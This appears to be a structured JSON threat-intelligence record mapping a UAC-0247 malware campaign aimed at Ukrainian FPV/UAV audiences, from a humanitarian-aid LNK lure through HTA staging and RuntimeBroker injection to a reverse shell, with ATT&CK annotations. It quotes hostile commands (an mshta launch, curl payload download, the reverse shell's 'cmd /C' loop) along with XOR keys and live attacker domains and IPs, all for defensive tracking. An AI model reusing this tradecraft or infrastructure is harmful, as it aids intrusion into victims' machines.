{ "iim_version": "1.1", "chain_id": "uac-0247-ukrvarta-fpv-dopomoga-2026-03", "title": "UAC-0247 UkrVarta FPV Lure to RuntimeBroker Injection and Reverse Shell", "description": "Campaign chain for a Ukraine-focused lure targeting FPV/UAV-related audiences. The flow starts with a humanitarian-aid themed archive/LNK and HTA delivery layer on ukrvarta.online, moves through external JavaScript and updater.txt payload staging, persists as OneDriveUpdater, injects a decoded shellcode stage into RuntimeBroker.exe, unpacks EncryptedReverseShell.exe, and communicates with 109.237.97.4:8443.", "actor_id": "UAC-0247", "observed_at": "2026-03-24T00:00:00Z", "confidence": "confirmed", "needs_review": false, "x_campaign": "UkrVarta FPV operators lure", "x_source_report": "Synaptic Security Blog: UAC-0247 Malware Targeting FPV operators", "x_scope_note": "IIM models the infrastructure and delivery graph. Host execution details such as ActiveX, scheduled tasks, direct syscalls, process injection, XOR and LZNT1 are preserved as evidence and ATT&CK annotations, but are not treated as primary IIM roles.", "x_key_findings": [ "Initial archive contains a Ukrainian humanitarian-aid themed LNK that invokes mshta against ukrvarta.online/dopomoga/dopomoga.hta.", "The delivery server applies geofenced delivery behavior and exposed directory indexes under /dopomoga and /conference.", "The newer HTA delegates execution logic to /dopomoga/script.js and downloads /dopomoga/updater.txt directly as OneDriveUpdater.exe.", "Older variants used /conference/updater.txt and XOR decoding with key 66 75 63 6b before writing the same updater payload.", "updater.exe injects decoded shellcode into RuntimeBroker.exe and the nested loader unpacks EncryptedReverseShell.exe.", "The final payload communicates with 109.237.97.4:8443 using a simple XOR-protected command channel." ], "entities": [ { "id": "e01_initial_zip", "type": "file", "value": "UkrVarta humanitarian-aid themed ZIP archive", "observed_at": "2026-03-24T00:00:00Z", "source": "Synaptic Security Blog", "evidence": [ "Archive contained LNK named 'Форма заявки на гуманітарну допомогу фонд УкрВарта'" ], "x_lure_theme": "UkrVarta Foundation humanitarian aid application form", "x_targeting": "Ukraine / FPV and UAV operators or interested parties" }, { "id": "e02_lnk_form", "type": "file", "value": "Форма заявки на гуманітарну допомогу фонд УкрВарта.lnk", "observed_at": "2026-03-24T00:00:00Z", "source": "Synaptic Security Blog", "evidence": [ "LNK command launches mshta.exe with https://ukrvarta.online/dopomoga/dopomoga.hta" ], "x_relative_path": "..\\..\\Windows\\System32\\mshta.exe", "x_execution_target": "https://ukrvarta.online/dopomoga/dopomoga.hta" }, { "id": "e03_ukrvarta_domain", "type": "domain", "value": "ukrvarta.online", "observed_at": "2026-03-24T00:00:00Z", "source": "Synaptic Security Blog", "evidence": [ "Delivery host for dopomoga, conference and WebDAV paths" ], "x_lure_branding": "UkrVarta", "x_observed_paths": [ "/dopomoga/", "/conference/", "/davwwwroot" ] }, { "id": "e04_dopomoga_hta", "type": "url", "value": "https://ukrvarta.online/dopomoga/dopomoga.hta", "observed_at": "2026-03-24T00:00:00Z", "source": "Synaptic Security Blog", "evidence": [ "New HTA is mostly a visual stub and loads external JavaScript from /dopomoga/script.js" ], "x_variant": "new", "x_ui_behavior": "Displays lure UI and fake confirmation popup" }, { "id": "e05_dopomoga_script_js", "type": "url", "value": "https://ukrvarta.online/dopomoga/script.js", "observed_at": "2026-03-24T00:00:00Z", "source": "Synaptic Security Blog", "evidence": [ "External obfuscated JavaScript instantiates WScript.Shell and Scripting.FileSystemObject via ActiveX" ], "x_stage_behavior": [ "Creates %LOCALAPPDATA%\\OneDriveUpdater", "Downloads updater.txt via cmd /c curl", "Writes OneDriveUpdater.exe", "Creates scheduled task named OneDriveUpdater with /f" ] }, { "id": "e06_dopomoga_updater_url", "type": "url", "value": "https://ukrvarta.online/dopomoga/updater.txt", "observed_at": "2026-03-24T00:00:00Z", "source": "Synaptic Security Blog", "evidence": [ "New script downloads updater.txt directly and stores it as %LOCALAPPDATA%\\OneDriveUpdater\\OneDriveUpdater.exe" ], "x_saved_as": "%LOCALAPPDATA%\\OneDriveUpdater\\OneDriveUpdater.exe", "x_delivery_change": "Direct file save instead of PowerShell EncodedCommand and XOR decode" }, { "id": "e07_conference_updater_url", "type": "url", "value": "https://ukrvarta.online/conference/updater.txt", "observed_at": "2026-03-24T00:00:00Z", "source": "Synaptic Security Blog", "evidence": [ "Older HTA/PowerShell path downloaded this URL and XOR-decoded it with key 66 75 63 6b" ], "x_variant": "old", "x_xor_key_hex": "66 75 63 6b", "x_xor_key_ascii": "fuck" }, { "id": "e08_conference_hta", "type": "url", "value": "https://ukrvarta.online/conference/conference.hta", "observed_at": "2026-03-24T00:00:00Z", "source": "Synaptic Security Blog", "evidence": [ "Conference-themed HTA presented as a legitimate FPV/UAV conference document and used the same dropper logic" ], "x_lure_theme": "Closed conference for UAV and EW manufacturers" }, { "id": "e09_webdav_searchms", "type": "url", "value": "search-ms:query=lnk&crumb=location:\\\\ukrvarta.online@8080\\davwwwroot", "observed_at": "2026-03-24T00:00:00Z", "source": "Synaptic Security Blog", "evidence": [ "conference2026_webdavroot.html redirects to a Windows search-ms URI pointing at a WebDAV share and filtering for LNK files" ], "x_delivery_mechanism": "Windows search-ms to WebDAV", "x_webdav_host": "ukrvarta.online:8080/davwwwroot" }, { "id": "e10_updater_sha256", "type": "hash", "value": "c06cc6122b798f88a05a088bfed39594af86ba714da89fec5ca62d7119782df9", "observed_at": "2026-03-24T00:00:00Z", "source": "Static analysis of updater.exe", "evidence": [ "PE32+ x86-64 GUI executable, size 222056 bytes, MD5 44fe18a23d6d2ca53a7234a934f438db", "EntryPoint VA 0x1400020a4, malware main around 0x140001a60" ], "x_filename": "updater.exe", "x_md5": "44fe18a23d6d2ca53a7234a934f438db", "x_pe_timestamp": "2026-03-14T20:42:39Z", "x_image_base": "0x140000000", "x_entrypoint_va": "0x1400020a4", "x_main_va": "0x140001a60", "x_stage_behavior": [ "Resolves NTDLL exports by CRC32 hash", "Extracts syscall numbers from NTDLL stubs", "Targets RuntimeBroker.exe", "Allocates remote memory, writes decoded shellcode, switches protection from PAGE_NOACCESS to PAGE_EXECUTE_READ, starts remote thread" ] }, { "id": "e11_runtimebroker_target", "type": "file", "value": "RuntimeBroker.exe", "observed_at": "2026-03-24T00:00:00Z", "source": "Static analysis of updater.exe", "evidence": [ "Outer loader searches for RuntimeBroker.exe before remote injection" ], "x_role_in_host_chain": "remote process injection target" }, { "id": "e12_shellcode_sha256", "type": "hash", "value": "c8117fdbc81dfae804ad03eb4c7a38017851c941ecfebb06f129c7923c0d3d8d", "observed_at": "2026-03-24T00:00:00Z", "source": "Static extraction from updater.exe .data blob", "evidence": [ "Encoded blob VA 0x14001a000, raw offset 0x18000, size 0x19321, XOR key 0x66", "Decoded first bytes: 57 31 c0 b9 0a 00 00 00" ], "x_md5": "c65535199517248fea9a4a34050ca474", "x_outer_xor_key": "0x66", "x_blob_size": "0x19321", "x_nested_loader": [ "Resolves LdrLoadDll, NtAllocateVirtualMemory, NtProtectVirtualMemory, NtFreeVirtualMemory", "Parses embedded package format", "Decrypts second package and decompresses it via RtlDecompressBuffer with LZNT1 format 0x2" ] }, { "id": "e13_final_payload_sha256", "type": "hash", "value": "b1d765f50f5c53702658b7a59a9bd05cfb042ea6b2d150191a84c53d373b9e4a", "observed_at": "2026-03-24T00:00:00Z", "source": "Static extraction from nested shellcode package", "evidence": [ "Final PE internal name EncryptedReverseShell.exe", "PE32+ x86-64 GUI executable, size 0x20800, MD5 8b2a9635f729c68cddedc00c70c8b4f2", "PDB path: C:\\Users\\user\\source\\repos\\EncryptedReverseShell\\x64\\Release\\EncryptedReverseShell.pdb" ], "x_filename": "EncryptedReverseShell.exe", "x_md5": "8b2a9635f729c68cddedc00c70c8b4f2", "x_entrypoint_va": "0x140001978", "x_reverse_shell_routine_va": "0x140001070", "x_c2_message_xor_key_hex": "01 01 02 03 74 15 04 ff ee" }, { "id": "e14_c2_ip", "type": "ip", "value": "109.237.97.4", "observed_at": "2026-03-24T00:00:00Z", "source": "Static analysis of final payload and campaign infrastructure", "evidence": [ "Final payload connects to 109.237.97.4:8443", "Same IP was observed as the server behind ukrvarta.online delivery infrastructure" ], "x_port": 8443, "x_socket_flow": [ "WSAStartup", "socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)", "connect(109.237.97.4:8443)", "send encrypted Connected! beacon", "receive encrypted command length and command", "execute via cmd /C %s", "encrypt and return command output" ], "x_hosting_note": "Observed as Nuxt.cloud-hosted server in campaign analysis" } ], "chain": [ { "entity_id": "e01_initial_zip", "role": "entry", "techniques": [ "IIM-T024" ], "role_confidence": "confirmed", "technique_confidence": "confirmed" }, { "entity_id": "e02_lnk_form", "role": "entry", "techniques": [ "IIM-T024" ], "role_confidence": "confirmed", "technique_confidence": "confirmed" }, { "entity_id": "e03_ukrvarta_domain", "role": "staging", "techniques": [ "IIM-T002", "IIM-T019", "IIM-T026" ], "role_confidence": "confirmed", "technique_confidence": "confirmed", "review_notes": "IIM-T002 is based on observed Nuxt.cloud hosting; IIM-T019 is based on geofenced payload delivery; IIM-T026 is based on exposed directory indexes under delivery paths." }, { "entity_id": "e04_dopomoga_hta", "role": "staging", "techniques": [ "IIM-T019" ], "role_confidence": "confirmed", "technique_confidence": "confirmed" }, { "entity_id": "e05_dopomoga_script_js", "role": "staging", "techniques": [], "role_confidence": "confirmed", "technique_confidence": "confirmed" }, { "entity_id": "e06_dopomoga_updater_url", "role": "payload", "techniques": [ "IIM-T019" ], "role_confidence": "confirmed", "technique_confidence": "confirmed" }, { "entity_id": "e07_conference_updater_url", "role": "payload", "techniques": [], "role_confidence": "confirmed", "technique_confidence": "confirmed", "review_notes": "Older staging path; included to preserve infrastructure evolution from /conference/ to /dopomoga/." }, { "entity_id": "e08_conference_hta", "role": "staging", "techniques": [], "role_confidence": "confirmed", "technique_confidence": "confirmed" }, { "entity_id": "e09_webdav_searchms", "role": "redirector", "techniques": [ "IIM-T015" ], "role_confidence": "confirmed", "technique_confidence": "confirmed", "review_notes": "Client-side redirect through search-ms into WebDAV-backed LNK discovery." }, { "entity_id": "e10_updater_sha256", "role": "payload", "techniques": [], "role_confidence": "confirmed", "technique_confidence": "confirmed" }, { "entity_id": "e11_runtimebroker_target", "role": "payload", "techniques": [], "role_confidence": "confirmed", "technique_confidence": "confirmed", "review_notes": "Host-side injection target preserved as payload evidence, not as a standalone infrastructure role." }, { "entity_id": "e12_shellcode_sha256", "role": "payload", "techniques": [], "role_confidence": "confirmed", "technique_confidence": "confirmed" }, { "entity_id": "e13_final_payload_sha256", "role": "payload", "techniques": [], "role_confidence": "confirmed", "technique_confidence": "confirmed" }, { "entity_id": "e14_c2_ip", "role": "c2", "techniques": [ "IIM-T002" ], "role_confidence": "confirmed", "technique_confidence": "likely", "review_notes": "Same IP appears to support delivery and final C2. Treat as infrastructure reuse across staging and C2." } ], "relations": [ { "from": "e01_initial_zip", "to": "e02_lnk_form", "type": "drops", "sequence_order": 0, "observed_at": "2026-03-24T00:00:00Z", "confidence": "confirmed" }, { "from": "e02_lnk_form", "to": "e04_dopomoga_hta", "type": "execute", "sequence_order": 1, "observed_at": "2026-03-24T00:00:00Z", "confidence": "confirmed", "x_execution": "mshta.exe https://ukrvarta.online/dopomoga/dopomoga.hta" }, { "from": "e03_ukrvarta_domain", "to": "e14_c2_ip", "type": "resolves-to", "sequence_order": 2, "observed_at": "2026-03-24T00:00:00Z", "confidence": "confirmed" }, { "from": "e04_dopomoga_hta", "to": "e05_dopomoga_script_js", "type": "references", "sequence_order": 3, "observed_at": "2026-03-24T00:00:00Z", "confidence": "confirmed" }, { "from": "e05_dopomoga_script_js", "to": "e06_dopomoga_updater_url", "type": "download", "sequence_order": 4, "observed_at": "2026-03-24T00:00:00Z", "confidence": "confirmed", "x_command_family": "cmd /c curl" }, { "from": "e06_dopomoga_updater_url", "to": "e10_updater_sha256", "type": "drops", "sequence_order": 5, "observed_at": "2026-03-24T00:00:00Z", "confidence": "confirmed", "x_saved_as": "%LOCALAPPDATA%\\OneDriveUpdater\\OneDriveUpdater.exe" }, { "from": "e08_conference_hta", "to": "e07_conference_updater_url", "type": "download", "sequence_order": 6, "observed_at": "2026-03-24T00:00:00Z", "confidence": "confirmed", "x_variant": "older conference path" }, { "from": "e07_conference_updater_url", "to": "e10_updater_sha256", "type": "drops", "sequence_order": 7, "observed_at": "2026-03-24T00:00:00Z", "confidence": "confirmed", "x_transform": "XOR decode with key 66 75 63 6b before writing executable" }, { "from": "e09_webdav_searchms", "to": "e02_lnk_form", "type": "references", "sequence_order": 8, "observed_at": "2026-03-24T00:00:00Z", "confidence": "likely", "x_variant": "alternate WebDAV/search-ms entry path" }, { "from": "e10_updater_sha256", "to": "e11_runtimebroker_target", "type": "execute", "sequence_order": 9, "observed_at": "2026-03-24T00:00:00Z", "confidence": "confirmed", "x_behavior": "Opens RuntimeBroker.exe process and injects decoded shellcode" }, { "from": "e10_updater_sha256", "to": "e12_shellcode_sha256", "type": "drops", "sequence_order": 10, "observed_at": "2026-03-24T00:00:00Z", "confidence": "confirmed", "x_transform": "Decode .data blob with XOR key 0x66" }, { "from": "e12_shellcode_sha256", "to": "e13_final_payload_sha256", "type": "drops", "sequence_order": 11, "observed_at": "2026-03-24T00:00:00Z", "confidence": "confirmed", "x_transform": "Nested package XOR decrypt and LZNT1 decompress via RtlDecompressBuffer format 0x2" }, { "from": "e13_final_payload_sha256", "to": "e14_c2_ip", "type": "communicates-with", "sequence_order": 12, "observed_at": "2026-03-24T00:00:00Z", "confidence": "confirmed", "x_port": 8443, "x_protocol": "TCP reverse shell with simple XOR-protected command and output channel" } ], "attack_annotations": [ { "technique_id": "T1204.002", "name": "User Execution: Malicious File", "tactic": "Execution", "comment": "Victim opens LNK/HTA lure content themed around Ukrainian humanitarian aid or FPV/UAV activity." }, { "technique_id": "T1218.005", "name": "System Binary Proxy Execution: Mshta", "tactic": "Defense Evasion / Execution", "comment": "LNK invokes mshta.exe to load the hosted HTA." }, { "technique_id": "T1059.007", "name": "Command and Scripting Interpreter: JavaScript", "tactic": "Execution", "comment": "HTA loads obfuscated JavaScript that uses ActiveX objects." }, { "technique_id": "T1105", "name": "Ingress Tool Transfer", "tactic": "Command and Control", "comment": "JavaScript downloads updater.txt and writes it as OneDriveUpdater.exe." }, { "technique_id": "T1053.005", "name": "Scheduled Task/Job: Scheduled Task", "tactic": "Persistence / Execution", "comment": "Dropper creates scheduled task OneDriveUpdater and new variant uses /f to overwrite existing task." }, { "technique_id": "T1055", "name": "Process Injection", "tactic": "Defense Evasion / Privilege Escalation", "comment": "updater.exe injects decoded shellcode into RuntimeBroker.exe using direct syscall workflow." }, { "technique_id": "T1027", "name": "Obfuscated Files or Information", "tactic": "Defense Evasion", "comment": "Outer payload blob uses XOR 0x66; older delivery used XOR key 66 75 63 6b; nested package uses XOR plus LZNT1 compression." }, { "technique_id": "T1059.003", "name": "Command and Scripting Interpreter: Windows Command Shell", "tactic": "Execution", "comment": "Final reverse shell executes received commands via cmd /C %s." }, { "technique_id": "T1571", "name": "Non-Standard Port", "tactic": "Command and Control", "comment": "Final payload connects to 109.237.97.4:8443." } ] }